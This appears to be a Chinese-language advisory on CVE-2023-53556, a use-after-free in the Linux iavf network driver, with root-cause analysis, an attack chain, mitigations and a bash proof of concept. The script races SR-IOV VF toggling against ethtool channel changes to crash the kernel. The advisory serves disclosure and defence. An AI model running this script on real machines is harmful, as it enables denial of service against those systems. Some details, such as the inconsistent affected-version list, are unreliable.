CVE-2023-53556：Linux内核iavf驱动free

漏洞信息

漏洞编号

CVE-2023-53556

漏洞类型

释放后使用（Use-After-Free）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核iavf（Intel Adaptive Virtual Function）网卡驱动

漏洞概述

CVE-2023-53556是Linux内核iavf（Intel Adaptive Virtual Function）驱动中存在的一个高危释放后使用（Use-After-Free）漏洞，CVSS评分为7.8。该漏洞源于iavf驱动在管理NAPI（New API）结构时的不一致操作：驱动对所有已分配的q_vectors[]数组执行了netif_napi_add()注册操作，但在某些情况下仅对部分q_vectors执行netif_napi_del()注销操作，随后便调用kfree()释放q_vectors内存，导致dev->napi_list中遗留了指向已释放内存的悬空指针。当系统调用free_netdev()释放网络设备时，内核会遍历napi_list链表并尝试访问这些已被释放的q_vectors内存，从而触发KASAN（Kernel Address Sanitizer）检测到的use-after-free错误。该漏洞可通过同时操作SR-IOV虚拟功能数量和网卡通道数来触发，影响系统的机密性、完整性和可用性，可能导致内核崩溃（Kernel Panic）或权限提升。

技术细节

从技术层面分析，该漏洞的根本原因是iavf驱动在处理q_vectors数组生命周期管理时存在逻辑缺陷。具体而言：

1. **注册阶段**：iavf_probe()或iavf_init_rss()等初始化函数会对所有分配的q_vectors调用netif_napi_add()，将对应的napi_struct结构添加到dev->napi_list链表中。

2. **注销阶段**：在某些错误处理路径或资源回收路径中，iavf_remove()或相关清理函数仅对部分q_vectors调用netif_napi_del()，而对其他q_vectors未执行注销操作就直接调用kfree()释放内存。

3. **悬空指针残留**：释放后，dev->napi_list中仍然保留着指向已释放q_vectors内存的napi_struct指针，形成悬空引用。

4. **触发释放后使用**：当SR-IOV被禁用（sriov_numvfs设置为0）时，系统会调用free_netdev()释放网络设备，该函数遍历dev->napi_list链表并访问每个napi_struct结构。由于napi_struct指向的内存已被释放，内核在读取该内存时触发use-after-free漏洞。

漏洞利用需要本地低权限用户访问系统，并能够操作sysfs中的SR-IOV配置（如sriov_numvfs）和网卡通道配置（如通过ethtool修改combined通道数），通过竞态条件触发该漏洞。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要本地访问一台运行受影响Linux内核版本的系统，该系统需要配备支持SR-IOV的Intel网卡（如X710/XL710系列），并在BIOS和内核中启用SR-IOV和Intel i40e/iavf驱动支持。

STEP 2

步骤2：权限获取

攻击者需要获取系统的本地低权限用户访问权限（如通过普通用户账户登录），因为漏洞利用需要操作sysfs文件系统中的sriov_numvfs和ethtool等接口。

STEP 3

步骤3：触发竞态条件

攻击者同时运行两个并发操作：一个线程反复切换SR-IOV虚拟功能数量（sriov_numvfs在0和2之间切换），另一个线程反复修改VF网卡的combined通道数（通过ethtool -L在1和4之间切换），制造iavf驱动的probe/remove和q_vector重分配的竞态条件。

STEP 4

步骤4：触发释放后使用

在竞态条件下，iavf驱动可能对部分q_vectors执行了netif_napi_add()但未执行对应的netif_napi_del()就释放了内存，导致dev->napi_list中残留悬空指针。当SR-IOV被禁用时，free_netdev()遍历napi_list访问已释放内存，触发use-after-free。

STEP 5

步骤5：内核崩溃或权限提升

use-after-free漏洞被触发后，攻击者可能利用该漏洞实现内核崩溃（拒绝服务）或在内核上下文中执行任意代码（权限提升），从而完全控制系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2023-53556 Proof of Concept
# Triggers use-after-free in iavf driver via concurrent SR-IOV and channel manipulation

pf_dbsf="0000:41:00.0"
vf0_dbsf="0000:41:02.0"
g_pids=()

function do_set_numvf()
{
    # Toggle SR-IOV VF count to trigger iavf probe/remove cycles
    echo 2 >/sys/bus/pci/devices/${pf_dbsf}/sriov_numvfs
    sleep $((RANDOM%3+1))
    echo 0 >/sys/bus/pci/devices/${pf_dbsf}/sriov_numvfs
    sleep $((RANDOM%3+1))
}

function do_set_channel()
{
    # Change number of combined channels to trigger q_vector reallocation
    local nic=$(ls -1 --indicator-style=none /sys/bus/pci/devices/${vf0_dbsf}/net/)
    [ -z "$nic" ] && { sleep $((RANDOM%3)) ; return 1; }
    ifconfig $nic 192.168.18.5 netmask 255.255.255.0
    ifconfig $nic up
    ethtool -L $nic combined 1
    ethtool -L $nic combined 4
    sleep $((RANDOM%3))
}

function on_exit()
{
    local pid
    for pid in "${g_pids[@]}"; do
        kill -0 "$pid" &>/dev/null && kill "$pid" &>/dev/null
    done
    g_pids=()
}

trap "on_exit; exit" EXIT

# Run both operations concurrently to trigger race condition
while :; do do_set_numvf ; done &
g_pids+=($!)
while :; do do_set_channel ; done &
g_pids+=($!)

wait

影响范围

Linux内核 < 6.6（iavf驱动受影响版本）

Linux内核 < 6.1.69

Linux内核 < 6.6.8

Linux内核 < 6.7.2

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）通过udev规则或文件权限限制普通用户对/sys/bus/pci/devices/*/sriov_numvfs文件的写访问权限；2）如果业务允许，临时禁用SR-IOV功能（将所有PF的sriov_numvfs设置为0并从内核中移除相关模块）；3）限制普通用户对ethtool工具的访问权限，防止通过修改网卡通道数触发竞态条件；4）启用内核的SLAB/SLUB调试功能和KASAN检测，以便在漏洞被触发时能够及时发现并记录。

CVE-2023-53556：Linux内核iavf驱动free_netdev释放后使用漏洞